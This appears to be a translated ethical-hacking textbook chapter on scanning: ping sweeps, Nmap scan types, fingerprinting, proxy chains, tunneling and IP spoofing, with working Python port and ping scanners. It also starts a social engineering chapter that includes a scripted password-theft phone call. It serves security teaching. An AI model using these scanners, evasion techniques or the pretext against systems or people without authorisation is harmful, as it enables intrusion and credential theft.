Port scanning is the process of identifying the open and available TCP/IP ports on a system. Port-scanning tools let a hacker learn which services are available on a given system. Every service or application is associated with a well-known port number; for example, a scanner that finds port 80 open has found a web server running there. Hackers need to know the well-known port numbers. Note: on Windows, the well-known ports are listed in the file C:\windows\system32\drivers\etc\services, a plain text file that can be opened with Notepad.

Network scanning
Network scanning is a procedure for identifying the active hosts on a network, either to attack them or to assess the network's security. Hosts are identified by their individual IP addresses. Network-scanning tools try to identify all the live or responding hosts on the network and their IP addresses.

Vulnerability scanning
Vulnerability scanning is the process of proactively identifying the vulnerabilities of the computer systems on a network. A vulnerability scanner first identifies the operating system and version number, including installed service packs, and then identifies the weaknesses and vulnerabilities in that operating system. In a later attack phase a hacker can exploit those weaknesses to gain access to the system. An intrusion detection system (IDS), or a professional security team with the right tools, can detect port-scanning activity. TCP/IP port scanners look for open ports and IP addresses, and vulnerability scanners are usually detectable as well, because they have to interact with the target system over the network.

2. Scan targets
Scanning interacts with the target computer system and its components. When scanning a system we pay attention to the following:

- Live systems: determine whether the target system is up, whether the host is reachable on the Internet, and whether its IP address is public.
- Ports: determine which ports are open. This tells us which services the machine exposes and therefore what the attack can aim at.

- Operating system: identifying the OS on the target helps the hacker find well-known vulnerabilities; every operating system has weaknesses an attacker can use, so identify the version as well as the family.
- Services: learn which services are running and listening on the target. Each service version carries its own bugs, and a small bug, well exploited, is not small at all.
- IP addresses: beyond the single IP of one host, determine the network range and the related hosts, such as the default gateway and DNS servers.

3. Scanning methods


The scanning process is described in Figure 5.2. It is the procedure a hacker follows to scan a network; it ensures that no system or vulnerability is overlooked and that all the information needed for an attack is gathered.

Figure 5.2: The scanning process

In brief, the steps are:
- Check whether the system exists and is running.
- Check which ports are open and can be interacted with.
- Identify the services behind the open ports.
- Map the network, paying special attention to hosts likely to be vulnerable.
- Fingerprint the operating system and related details.
- Prepare a proxy for the attack.
- Attack. (This last step is only illustrative; a real attack involves many more stages.)

3.1. Checking whether the target system is alive

We will now look at a few techniques used to check whether a target system exists.

Ping sweeps

Scanning methods begin by checking which systems are live on the network, meaning systems that respond to probe or connection requests. The simplest, though not the most accurate, way to determine whether a system is live is to perform a ping sweep over an IP range. Every system that replies to the ping is considered live. ICMP (Internet Control Message Protocol) scanning is the process of sending an ICMP echo request (a ping) to every host on the network to determine which hosts exist and answer. The benefit of ICMP scanning is that it can run in parallel, with all systems probed at the same time, so an entire network can be scanned quickly. Most hacking tools include a ping-sweep option, which essentially sends an ICMP request to every host on the network. A significant problem with this method is that personal firewalls and network firewalls can stop systems from replying to the sweep. Another is that a host must be powered on at the time to be detected.
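The ICMP echo exchange a ping sweep is built on, as an added example that is not one of the tools named in the text: it builds an echo request with the RFC 1071 checksum, verifies replies, and sweeps a range in parallel with a thread pool, which is the parallelism the paragraph above refers to. The raw-socket sender needs root or CAP_NET_RAW and real network access; the packet functions run offline on the constructed packet. The helper names and the payload are this example's own.

```python
"""ICMP echo request construction and a parallel ping sweep (added example)."""
import ipaddress
import os
import socket
import struct
import time
from concurrent.futures import ThreadPoolExecutor

ECHO_REPLY, ECHO_REQUEST = 0, 8


def internet_checksum(data):
    """RFC 1071: one's-complement of the one's-complement sum of the 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(ident, seq, payload=b"ping-sweep"):
    """Type 8, code 0; the checksum covers header and payload and is computed with the field zeroed."""
    header = struct.pack("!BBHHH", ECHO_REQUEST, 0, 0, ident, seq)
    csum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_icmp(packet):
    """Parse an ICMP message (IP header already removed); None when the checksum does not verify."""
    if len(packet) < 8 or internet_checksum(packet) != 0:
        return None
    typ, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq, "payload": packet[8:]}


def ping_host(ip, timeout=1.0):
    """One echo request on a raw socket (root or CAP_NET_RAW); True if a matching reply arrives."""
    ident = os.getpid() & 0xFFFF
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        s.sendto(build_echo_request(ident, 1), (ip, 0))
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            try:
                data, (src, _) = s.recvfrom(1500)
            except socket.timeout:
                break
            ihl = (data[0] & 0x0F) * 4                 # raw ICMP sockets deliver the IP header too
            reply = parse_icmp(data[ihl:])
            if reply and reply["type"] == ECHO_REPLY and reply["id"] == ident and src == ip:
                return True
    return False


def ping_sweep(cidr, workers=64):
    """Ping every host address in the range in parallel; returns the IPs that answered."""
    hosts = [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        alive = list(pool.map(ping_host, hosts))
    return [ip for ip, up in zip(hosts, alive) if up]


if __name__ == "__main__":
    print(build_echo_request(0x1234, 1).hex())
```

A host that does not appear in the sweep's result has not been shown to be down: it may simply sit behind a firewall that drops echo requests, which is why the next step is a port scan rather than a conclusion.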
Hacking Tools

Pinger, Friendly Pinger and WS_Ping_Pro are all programs that perform ping sweeps. You will be shown how to use them in the lab.

Countering ping sweeps

Almost any intrusion detection system (IDS) or intrusion prevention system (IPS) will detect a ping sweep in progress on the network and alert the security administrator. Most firewalls and proxy servers block ping replies, so a hacker cannot reliably tell with a ping sweep whether a system is up. A port scan is used instead when a system does not answer the ping sweep. Just because a ping sweep receives no reply from any host on the network does not mean no hosts are available; you need to try other identification methods. Remember that hacking takes time, patience and persistence.

3.2. Probing ports and identifying services

Checking for open ports is the second step of the scanning process. Port scanning is the method used to find them: it probes every port on the host to determine which are open. Port scanning is usually worth more than a ping sweep because it reveals both the host and the exposure of the system.

Identifying the running services is the third step. It is usually done with the same tools as port scanning: once an open port is found, the hacker identifies the service conventionally associated with that port number.

Port-scan countermeasures

Countermeasures are the processes and tools security administrators use to detect and, where possible, prevent port scanning of the hosts on their network. The list of countermeasures to stop a hacker from gathering information through port scanning includes:
- A proper security architecture, with an IDS and firewalls deployed together. An ethical hacker uses the organization's own tools to run scans and verify the countermeasures: once a firewall is in place, a port-scanning tool should be run against the hosts on the network to confirm that the firewall detects and stops the scanning activity accurately.
- Firewalls should detect the probes sent by port-scanning tools and should perform stateful inspection, examining not only the TCP header but also the packet data to decide whether to let it through.
- A network IDS should be used to detect the OS-detection methods used by common hacking tools such as Nmap.
- Only the ports that are needed should be left open; the rest should be filtered or blocked.
- Staff using the systems should receive appropriate security-awareness training and know the security policies they must follow.

Nmap command switches

Nmap is a free, open-source tool that performs ping sweeps, port scans, service identification, IP address determination and OS detection quickly and efficiently. It is well suited to scanning large numbers of machines in a single session, and it runs on many operating systems, including Unix, Linux and Windows. Nmap reports a port as open, closed, filtered or unfiltered (plus open|filtered and closed|filtered when it cannot decide). Open means the target accepts connections on that port. Closed means the port answers (with RST) but nothing is listening on it. Filtered means a firewall or filter is blocking the probe, so Nmap cannot tell whether the port is open. Unfiltered means the port is reachable (it answers an ACK probe) but Nmap cannot tell whether it is open or closed. Nmap supports many scan types; Figure 5.3 describes the common ones.

Figure 5.3: Scan types supported by Nmap

- TCP connect: the attacker completes a full TCP connection to the target.
- XMAS tree scan: the attacker checks TCP services by sending a packet with the FIN, URG and PSH flags set (the flags are explained below).
- SYN stealth scan: also called half-open scanning. The hacker sends a SYN and receives a SYN/ACK from the server, then tears the connection down with RST instead of completing it. It is stealthier because no full TCP connection is opened, so the application never sees (or logs) a connection.
- Null scan: a packet with no flags set at all. Null scans only work against UNIX-like systems whose TCP stack follows RFC 793.
- Window scan: similar to the ACK scan, but it examines the TCP window field of the RST replies and can thereby tell open ports from closed ones on some systems.
- ACK scan: used to map firewall rules; it tells whether a port is filtered or unfiltered rather than open or closed.
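A TCP connect scan in Python, added here as an example (not one of the tools named in the text) of the second and third steps above: it completes the handshake with connect(), classifies each port as open, closed or filtered from the result, and maps the open ports to service names from the OS services file (the file mentioned in section 1). open_local_listener is a helper this example adds so the scanner can be tried against a listener on the local machine.

```python
"""TCP connect scan with service-name lookup (added example; not a tool from the text)."""
import errno
import socket
from concurrent.futures import ThreadPoolExecutor


def service_name(port, proto="tcp"):
    """Conventional service for a port number, from the OS services file."""
    try:
        return socket.getservbyport(port, proto)
    except OSError:
        return "unknown"


def probe_port(host, port, timeout=0.5):
    """Complete the three-way handshake with connect(); states as Nmap's -sT reports them."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            err = s.connect_ex((host, port))
        except OSError:                      # includes socket.timeout
            return "filtered"
    if err == 0:
        return "open"                        # SYN/ACK received and the handshake completed
    if err == errno.ECONNREFUSED:
        return "closed"                      # RST received: the host is up, nothing listens
    return "filtered"                        # no answer in time: something drops the probe


def connect_scan(host, ports, timeout=0.5, workers=64):
    """Probe the ports in parallel; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def report(host, results):
    """One line per non-filtered port, scanner style: state, port/tcp, service name."""
    return [f"{state:<8} {port}/tcp  {service_name(port)}"
            for port, state in sorted(results.items()) if state != "filtered"]


def open_local_listener():
    """Listener on an ephemeral loopback port, so the scanner can be tried without a remote target."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print("\n".join(report(target, connect_scan(target, range(1, 1025)))))
```

Because every probe completes the handshake, the target application sees a real connection and can log it; that is the cost of this scan type, and the reason the half-open SYN scan described next exists.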

Nmap has many command-line switches for the different scan types; the common ones are listed in Figure 5.4.

Figure 5.4: Nmap scan-type switches

You will learn to use Nmap in more detail in the lab.

SYN, stealth, XMAS, NULL, IDLE and FIN scans

As a hacker you need to be familiar with the following scan terms:
- SYN: a SYN or stealth scan is also called a half-open scan because it does not complete the TCP three-way handshake (described in the next section). The hacker sends a SYN to the target; if a SYN/ACK comes back, the port is assumed to be listening and the connection is never completed (the scanner replies with RST instead). If an RST comes back, the port is assumed closed. The advantage of the SYN stealth scan is that the application is less likely to log it as an attempted connection than a full connect, although an IDS can still see it.
- XMAS: sends a packet with the FIN, URG and PSH flags set. If the port is open there is no reply; if it is closed, the target returns RST/ACK. XMAS scans only work against TCP stacks that follow RFC 793, and not against any version of Windows.
- FIN: like XMAS but with only the FIN flag set. Its replies and limitations are the same as for XMAS.
- NULL: like XMAS and FIN in replies and limitations, but the packet has no flags set at all.
- IDLE: uses a spoofed source IP address (a "zombie" host) to send SYN packets to the target. Depending on the reply, the port is classified open or closed; the scanner reads the result by watching the IP header ID sequence of the zombie.

The TCP connection protocol

TCP scan types are built on the TCP three-way handshake. A TCP connection requires the handshake before the connection is established and data flows between sender and receiver. Figure 5.5 shows the steps.

Figure 5.5: The TCP three-way handshake

To complete the handshake and establish a connection, the sender sends a TCP packet with the synchronize (SYN) bit set. The receiver replies with a packet that has both the synchronize (SYN) and acknowledge (ACK) bits set, indicating that it is ready to receive data. The sender finishes with a packet that has the acknowledge (ACK) bit set, indicating that the connection is complete and data can be sent. Because TCP is connection-oriented, establishing a connection (the three-way handshake), restarting a failed connection and ending a connection are all part of the protocol. These protocol notifications are carried by flags. TCP has the flags ACK, RST, SYN, URG, PSH and FIN:
- SYN (synchronize): initiates a connection between hosts.
- ACK (acknowledge): confirms receipt and establishes the connection.
- PSH (push): tells the system to pass buffered data up immediately.
- URG (urgent): the data in the packet must be processed quickly.
- FIN (finish): no more data; the connection is being closed.
- RST (reset): resets the connection.

A hacker can evade detection by using individual flags instead of completing a normal TCP connection.
Hacking Tool

The following tools perform port scanning and service identification. IPEye is a command-line TCP port scanner that can do SYN, FIN, NULL and XMAS scans. It probes the ports on a host and reports each as closed, reject, drop or open. Closed means a host is there but nothing listens on the port; reject means a firewall refused the connection; drop means a firewall discards everything sent to the port, or there is no host at that address; open means some service is listening on the port. These responses help the hacker identify the type of system that is answering.

IPSecScan is a tool that can scan a single IP address or a range of IP addresses looking for system information. Netscan Tools Pro 2000, Hping2, KingPing, icmpenum, and SNMP Scanner are all scanning tools and can also be used for OS fingerprinting. Icmpenum not only uses ICMP Echo packets to probe networks, but also ICMP Timestamp and ICMP Information packets. Furthermore, it supports spoofing and sniffing for reply packets. Icmpenum is excellent for scanning networks when the firewall blocks ICMP Echo but fails to block Timestamp or Information packets. Hping2 is notable because it includes a host of features besides OS fingerprinting, such as TCP, User Datagram Protocol (UDP), ICMP, and raw-IP ping protocols, a traceroute mode, and the ability to send files between the source and target system. SNMP Scanner lets you scan a range or list of hosts, performing ping, DNS, and Simple Network Management Protocol (SNMP) queries.

Understanding War-Dialing

War-dialing is the process of dialing modem numbers to find an open modem connection that provides remote access to a network for an attack against the target system. The term war dialing originates from the early days of the Internet, when most companies were connected to the Internet through dial-up modem connections. War dialing is considered a scanning method because it finds another network connection that may have weaker security than the main Internet connection. Many organizations set up remote access through modems, which are now legacy, but have not removed these remote-access servers. This gives hackers an easy way into the network through much weaker security mechanisms. For example, many remote-access systems use the Password Authentication Protocol (PAP), which sends passwords in clear text, whereas newer VPN technology uses encrypted passwords. War-dialing tools work on the premise that companies do not control their dial-in ports as strictly as their firewall, and that computers with modems attached are everywhere, even when those modems are no longer in use. Many servers still have modems with phone lines connected as a backup in case the primary Internet connection fails. These modem connections can be used by a war-dialing program to gain remote access to the system and the internal network. Figure 4.6 shows the basic operating model of war-dialing. Here we see the hacker using his own modem to dial a connection into the company's network.
Figure 5.6: How war-dialing works
Hacking Tool

THC-Scan, PhoneSweep, War Dialer, and TeleSweep are all tools used to identify phone numbers and can dial a target to make a connection with a computer modem.

These tools generally work by using a predetermined list of usernames and passwords in an attempt to gain access to the system. Most remote-access dial-in connections are not secured with a password or use very rudimentary security.

3.3. Understanding Banner Grabbing and Operating System Fingerprinting


Banner grabbing and operating system identification, which can also be defined as fingerprinting the TCP/IP stack, is the fourth step in the CEH scanning methodology. The process of fingerprinting allows the hacker to identify particularly vulnerable areas of a target on the network. Banner grabbing is the process of opening a connection and reading the banner returned by the application. Many servers (mail, web, FTP) will reply to a telnet connection with the name and version of their software. The hacker can find many correlations between the operating system and the application software. For example, the Microsoft Exchange e-mail server can only be installed on a Windows OS. OS fingerprinting is the technique of determining the operating system running on the target host. There are two methods of performing OS fingerprinting: Active stack fingerprinting is the most common form of fingerprinting. It involves sending data to the system to see how the system responds. It is based on the fact that different operating system vendors implement the TCP stack differently, so responses differ depending on the operating system. The responses are then compared to a database to determine the operating system. Active stack fingerprinting is detectable because it repeatedly attempts to connect to the target system. Passive stack fingerprinting is stealthier and involves examining traffic on the network to determine the operating system. It uses sniffing techniques instead of scanning techniques. Passive stack fingerprinting usually goes undetected by an IDS or other security system, but it is less accurate than active fingerprinting.
Hacking Tool

Telnet can also be used to gather operating system information when you connect to a host. p0f, httprint, and Mairn HTTP Header are tools that gather operating system information passively, while tools such as Xprobe2, RING v2, and Netcraft gather it actively.

Countering operating system information gathering

Change the operating system information in the banner header of the web server. With Apache you can load the module named mod_headers and edit the configuration in the httpd.conf file:

Header set Server "New Server Name"

With IIS you can use tools such as the IIS Lockdown Tool or ServerMask. Both tools can change the server's banner header or hide it entirely so that it is not shown to users.

3.4. Network Mapping

Drawing a map of the target hosts is necessary, paying particular attention to vulnerable hosts. Network management tools can assist in this step. Such tools are normally used to manage network devices, but an enterprising hacker can turn them against security administrators. SolarWinds Toolset, Queso, Harris Stat, and Cheops are network management tools used to identify operating systems, map networks, list the services running on a network, perform general port scans, and more. These tools draw the whole network in a GUI, including routers, servers, hosts, and firewalls. Most of these tools can discover IP addresses, host names, services, operating systems, and version information.

Figure 5.7: The LanState working interface

Netcraft and HTTrack are operating system fingerprinting tools. Both are used to determine the operating system and the web-server software version.

Netcraft is a website that periodically polls web servers to determine the operating system version and web-server software version. Netcraft can provide useful information that a hacker can use to discover vulnerabilities in the web-server software. In addition, Netcraft has an anti-phishing toolbar and a web-server verification tool that you can use to make sure you are using the real web server rather than a fake one. HTTrack preserves the original site's relative link structure. You open a page of the mirrored website in your browser, and then you can browse the site from link to link as if you were viewing it online. HTTrack can also update an existing mirrored site and resume interrupted downloads.

3.5. Deploying Proxy Servers for an Attack

Preparing proxy servers is the last step in the CEH scanning methodology. A proxy server is a computer that acts as an intermediary between the hacker and the target computer. Using a proxy server can allow a hacker to become anonymous on the network. The hacker first connects to the proxy server and then requests a connection to the target through the existing connection to the proxy. Essentially, the proxy requests access to the target rather than the hacker's computer. This lets the hacker surf the web anonymously or hide during the attack.

Figure 5.8: The attacker's attack models

Figure 4.8 shows the attack models that attackers apply. The direct attack (1) is the least used, because the risk of detection is very high. The two remaining methods, through a proxy (2) and through a series of intermediate computers (3), are used more often. However, the third method is harder to deploy and is usually applied to a large-scale attack. You can easily find free proxy servers on the Internet. With the keyword "free proxy server" on Google you can find many websites offering this feature.
Hacking Tool

SocksChain is a tool that gives a hacker the ability to attack through a chain of proxy servers. The main purpose of this is to hide the real IP address and therefore keep the chance of detection as low as possible. When a hacker works through several proxy servers in series, it is much harder to locate the hacker. Tracking the attacker's IP address through the logs of the proxy servers is complex and tedious work. If one of the proxy servers' log files is lost or incomplete, the chain is broken, and the hacker's IP address remains anonymous.

SSL Proxy

SSL Proxy is a transparent proxy used to convert between two systems, one encrypted and one unencrypted. You use SSL Proxy in the following cases:

Attacking a system that has an SSL service installed.
Extracting information from a system through an IDS.
Using SSL Proxy to create a tunnel to the target system, passing through an IDS that could otherwise block the attack.

Figure 5.9: Using SSL Proxy to carry out an attack


Hacking Tool

SSL Proxy is also the name of a command-line tool that lets us create an SSL proxy tunnel for an upcoming attack. The figure below shows the basic command-line usage when setting up SSL Proxy.

Figure 5.10: SSL Proxy usage

4. Anonymizer techniques (Anonymously)
Anonymizers (anonymous surfing) are services that attempt to make web surfing anonymous by using a website that acts as a proxy server for the web client. The first anonymizer software was developed by Anonymizer.com; it was created in 1997 by Lance Cottrell. An anonymizer service removes all identifying information from the user's computer while the user surfs the Internet, thereby ensuring the user's privacy. To visit a website anonymously, the hacker enters the website address into the anonymizer software, and the anonymizer software makes the request for the selected page. All requested pages are relayed through the anonymizer site, which makes it hard to trace the requests back to the requester.

Figure 4.11 shows an example: you want to access the website www.target.com but are blocked by the web server's security policy. You gain access by going through an anonymizing website, www.proxify.com.

Figure 5.11: Accessing the web through an anonymizer
Hacking Tool

The following websites help us stay anonymous when browsing the web:

http://www.primedius.com
http://www.browzar.com
http://www.rorrify.com

5. HTTP Tunneling


A popular method of bypassing a firewall or IDS is to tunnel a blocked protocol (such as SMTP) through an allowed protocol (such as HTTP). Most IDSs and firewalls act as a proxy between a client's PC and the Internet and only allow access to hosts defined as allowed. Most companies allow HTTP traffic because it is usually benign web access. However, a hacker can create a tunnel over the HTTP protocol to reach the internal network with a protocol that is not allowed. HTTP tunneling is not only for hackers. You can use it to build a secure connection between two branch offices over HTTP. Figure 4.12 is an example of two branches exchanging data over FTP while that protocol is blocked by the firewall. In this way, the client can connect to the FTP server and fetch data through the HTTP tunnel.

Figure 5.12: Client connecting to FTP through HTTP tunneling
Hacking Tool

HTTPort, Tunneld, and BackStealth are all tools for tunneling through HTTP. They allow bypassing an HTTP proxy that blocks certain Internet access methods. These tools let applications such as e-mail, IRC, ICQ, AIM, FTP, and other dangerous software be used from behind an HTTP proxy.

6. IP Spoofing


A hacker can spoof an IP address when scanning target systems to minimize the chance of detection. When the victim sends a reply to that IP address, the reply goes to the spoofed address, not to the hacker. One drawback of IP spoofing is that a TCP session cannot be completed, because the ACK reply cannot be sent.

Source routing lets the attacker specify the route a packet takes through the Internet. This can also reduce the chance of detection by bypassing the IDS and firewall. Source routing is implemented in the TCP/IP protocol in two forms:

Loose Source Routing (LSR): inexact routing. The sender sends a list of IP addresses that includes its own.
Strict Source Routing (SSR): exact routing. The sender specifies a portion of the path the packet travels. The reply packet will travel back along that path.

Source routing uses the address field of the IP header, which is up to 39 bytes, meaning that at most 8 IP addresses can be added to the address field. The sending machine sends the packet through a series of spoofed IP addresses, among which is the attacker's real IP.

Figure 5.13: The IP spoofing attack process

Figure 4.13 is an example of the IP spoofing process. Note that the spoofed packet has a source address (from address) of 10.0.0.5 and is sent to 10.0.0.25. When the machine 10.0.0.25 replies, the reply goes to 10.0.0.5, which is not the hacker's computer.

Countering IP spoofing

To detect IP address spoofing, you can compare time-to-live (TTL) values: the attacker's TTL will differ from the TTL of the spoofed address.

Figure 5.14: Detecting IP spoofing
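The TTL comparison just described, as an added Python example that is not part of the original text: a baseline of TTL values per source address is learned from trusted traffic, and later packets claiming a known source with an inconsistent TTL are flagged. The packet records and the 10.0.0.x / 203.0.113.9 addresses are constructed sample data; the record layout (src, dst, ttl) is this example's own assumption.

```python
"""Flag packets whose TTL contradicts the TTL baseline of their claimed source.

Added example: packet records are constructed sample data; the record layout
(src, dst, ttl) is this example's assumption.
"""
from collections import defaultdict

INITIAL_TTLS = (64, 128, 255)   # common default initial TTLs of operating systems


def hop_estimate(ttl):
    """Return (initial_ttl, hops): the smallest common initial TTL not below
    the observed TTL, and the hop count that implies."""
    for init in INITIAL_TTLS:
        if ttl <= init:
            return init, init - ttl
    return None, None


def learn_baseline(packets):
    """Collect the TTL values seen per source over a trusted period.
    Returns {src: set of TTLs}."""
    seen = defaultdict(set)
    for p in packets:
        seen[p["src"]].add(p["ttl"])
    return dict(seen)


def detect_spoofed(packets, baseline, tolerance=2):
    """Return (src, dst, reason) for packets whose TTL is inconsistent with
    the sender's baseline.

    A packet is flagged when its claimed source has a baseline and the
    observed TTL differs from every baseline value by more than `tolerance`.
    Sources without a baseline are skipped: there is nothing to compare with.
    """
    alerts = []
    for p in packets:
        known = baseline.get(p["src"])
        if not known:
            continue
        if any(abs(p["ttl"] - t) <= tolerance for t in known):
            continue
        base_init, base_hops = hop_estimate(max(known))
        obs_init, obs_hops = hop_estimate(p["ttl"])
        reason = (f"ttl {p['ttl']} (init {obs_init}, ~{obs_hops} hops) vs baseline "
                  f"{sorted(known)} (init {base_init}, ~{base_hops} hops)")
        alerts.append((p["src"], p["dst"], reason))
    return alerts


# Constructed trusted traffic: 10.0.0.5 is on the local LAN (TTL 64, 0 hops)
TRUSTED = [
    {"src": "10.0.0.5", "dst": "10.0.0.25", "ttl": 64},
    {"src": "10.0.0.5", "dst": "10.0.0.25", "ttl": 64},
    {"src": "10.0.0.7", "dst": "10.0.0.25", "ttl": 63},
]

# Constructed later traffic: one genuine packet, one packet claiming to be
# 10.0.0.5 but arriving with TTL 116 (128 initial, about 12 hops away),
# and one packet from a source with no baseline
OBSERVED = [
    {"src": "10.0.0.5", "dst": "10.0.0.25", "ttl": 63},
    {"src": "10.0.0.5", "dst": "10.0.0.25", "ttl": 116},
    {"src": "203.0.113.9", "dst": "10.0.0.25", "ttl": 51},
]


def run_check():
    """Learn from TRUSTED, then check OBSERVED; returns the alert list."""
    return detect_spoofed(OBSERVED, learn_baseline(TRUSTED))


if __name__ == "__main__":
    for src, dst, reason in run_check():
        print(f"possible spoof of {src} -> {dst}: {reason}")
```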

7. Countermeasures against Scanning


Several countermeasures against scanning techniques have already been introduced in this chapter. However, I want to add a few more points about countering scanning. A firewall is an important part of the network. As you have seen in this chapter, scanning tools have a hard time getting past a firewall. An intrusion detection system (IDS) is also an indispensable part of any network deployment that wants to counter scanning. This system can only detect a scan; it cannot block the scanning process. Open only the ports that are needed and close the ports that are not, so that an attacker cannot exploit them. Sensitive information, such as the operating system and the software versions in use, should not be exposed to the Internet.

8. Summary
In this chapter you need to understand the following points:

There are three main types of scanning: port, network, and vulnerability scanning.
How to tell whether a system is alive.
How to use an ICMP ping sweep.
The well-known port scanning tool Nmap.
The differences among the scan types in the TCP family (TCP connect, SYN, NULL, IDLE, FIN, and XMAS) and when to use each.
The TCP three-way handshake. Understanding it helps us attack with less risk of detection.
IDS and IPS systems are used to counter scanning.
What war dialing is; it is used to attack dial-in systems.
Fingerprinting has two types, active and passive; it is used to gather operating system information.
Anonymizer techniques for anonymous web surfing, HTTP tunneling, and IP spoofing are techniques that help us stay anonymous during an attack. Using them helps


CHAPTER 4: SOCIAL ENGINEERING


Social engineering is a non-technical method of breaking into a system or a company network. It is the process of deceiving the users of a system, or persuading them to provide information that can help us defeat the security department. Social engineering is important to understand because hackers can exploit the human element to attack and break through existing technical security systems. This method can be used to gather information before or during an attack.

1. What is social engineering?
Social engineering uses influence and persuasion to deceive users in order to extract information that is useful for the attack, or to convince the victim to carry out some action. A social engineer (a person who attacks using social engineering) commonly uses the telephone or the Internet to trick people into revealing sensitive information or to get them to do something that goes against the organization's security policies. With this method, the social engineer exploits the natural habits of users rather than looking for security holes in the system. This means that users with poor security knowledge are the opening this attack technique needs. The following is an example of a social engineering attack recounted by Kapil Raina, now a security expert at Verisign; the story took place when he was working at a different company:

One morning a few years ago, a group of strangers walked into the company as employees of a shipping company that this company had a contract with. And they walked out with access to the company's entire network. How did they do it? By obtaining small amounts of access information from a number of different employees of the company. First, they carried out general research on the company two days beforehand. Next, they pretended to have lost the key to the front door, and a company employee helped them get in. Then they pretended to have lost their security badge for the company entrance, and with nothing more than a friendly smile, the security guard opened the door for them. They had learned beforehand that the chief financial officer had just gone on a trip out of town, and that this man's information could help them attack the system. So they broke into the CFO's office. They rummaged through the company's trash looking for useful documents. Through the company's janitor they gained access to further places holding documents important to them that were someone else's trash. The final key element they used was imitating the CFO's voice. This succeeded because they had studied the CFO's voice. And the information about the CFO that they had collected from the trash helped them create absolute trust with the employees. An attack took place when they called the IT department in the role of the head of the finance department, pretending to have lost his password and urgently needing a new one. They went on to use other information and many attack techniques that helped them take over the entire network.

The most dangerous aspect of this attack technique is its process of verifying personal information. Firewalls, virtual private networks, and network monitoring software do not help stop the attack, because this attack technique does not use direct technical measures. Instead, the human factor is what matters. It was the carelessness of the company's employees in the story above that let the attacker gather important information.

2. The art of manipulation


Social engineering involves obtaining confidential information or unauthorized access by building relationships with certain people. The result of social engineering is tricking someone into providing valuable information. It plays on inherent human qualities, such as the desire to be helpful, the tendency to trust people, and the fear of getting into trouble. Social engineering applies tricks and techniques to get someone to agree to do what the social engineer wants. It is not a way of controlling other people's thoughts, and it does not let the social engineer make someone do something beyond ordinary ethical conduct. And above all, it is not at all easy to carry out. Nevertheless, it is a method that most attackers use to attack companies. There are two very common types:

Social engineering is obtaining the necessary information from someone rather than breaking the system.
Psychological subversion: the goal of a hacker or attacker using PsychSub (a psychology-oriented technique) is more complex and involves preparation, analysis of the situation, and careful, precise thought about the words used and the tone of voice when speaking; it is commonly used in the military.

The following is a scenario in which an attacker steals a customer's password. If you want to become a hacker you can learn from it; if you are a user, be careful when you run into a similar situation. One morning, Alice is having breakfast when she receives a phone call.

Attacker: Hello, this is Bob, I'd like to speak with Ms. Alice.

Alice: Hello, this is Alice.
Attacker: Hello Ms. Alice, I'm calling from the data center, sorry for calling you so early. The thing is...
Alice: The data center? I'm having breakfast, but that's fine.
Attacker: I'm calling because there is a problem with the personal information on your account creation form.
Alice: Mine... yes.
Attacker: I'm informing you that the mail server crashed last night, and we are trying to restore the mail system. Since you are a remote user, we are handling your case first.
Alice: So is my mail lost?
Attacker: No, we can restore it. But since we are data center staff, and we are not allowed to interfere with the office's mail system, we need your password; otherwise we can't do anything.
Alice: My password? Uhm...
Attacker: Yes, we understand; the registration form clearly states that we must not ask about this, but it was written by the legal office, so everyone has to follow the rules. (This is the moment to increase the victim's trust.)
Attacker: Your username is AliceDxb, right? The systems department gave us your username and phone number, but they did not give us the password. Without the password nobody can access your mail, not even us in the data center. But we have to restore your mail, and we need to access your mailbox. We assure you that we will not use your password for any other purpose.
Alice: Uhm, this password isn't all that private anyway; my password is 123456.
Attacker: Thank you for your cooperation. We will restore your mail in a few minutes.
Alice: Are you sure the mail won't be lost?
Attacker: Of course not. You have probably never run into this situation before; if you have any questions, please contact us. You can find our contact number on the Internet.
Alice: Thank you.

Attacker: Goodbye.

3. Human weaknesses
People have many weaknesses when it comes to security. To defend successfully we must rely on good policies and on training employees to follow those policies well. Social engineering is the hardest method to defend against because it cannot be countered with hardware or software. Once someone has access to any part of the system, the physical devices and the power supply can become a major obstacle. Any information that is collected can be used in social engineering to gather still more information. This means that even a person who is not covered by the security policy can break the security system. Security experts hold that security through obscurity is very weak. In the case of social engineering, there is no security at all: it is impossible to hide who is using the system and how much they can affect it. There are many ways to achieve the goal. The simplest is the direct request, that is, asking the question outright. Although this rarely succeeds, it is the easiest and simplest method, and the person knows exactly what they need. The second way is to create a situation that the victim is involved in. With the various factors that have to be considered, this is where the victim is most easily trapped, because the attacker can create reasons more persuasive than an ordinary person could. The harder the attacker works, the higher the chance of success and the more information is obtained. This does not mean that these situations are not based on reality: the closer they are to the truth, the higher the chance of success. One of the important tools used in social engineering is a good memory for collecting facts. That is something hackers and sysadmins excel at, especially when it comes to matters in their own field.

4. Classification of social engineering attack techniques


Social engineering can be divided into two common categories:

Human-based: social engineering techniques that involve human-to-human interaction to obtain the desired information. For example, calling the help desk to retrieve a password.
Computer-based: techniques that involve the use of software to try to gather the needed information. For example, sending an e-mail asking users to re-enter their password on a website. This technique is also called phishing.

4.1. Human-Based Social Engineering

Human-based techniques can be divided into the following categories:

Impersonation: posing as a legitimate employee or user. In this technique, the attacker pretends to be a company employee or a legitimate user of the system. The hacker impersonates a security guard, employee, or partner in order to enter the company. Once inside, they gather information from trash cans, desks, or computer systems, or by asking colleagues.

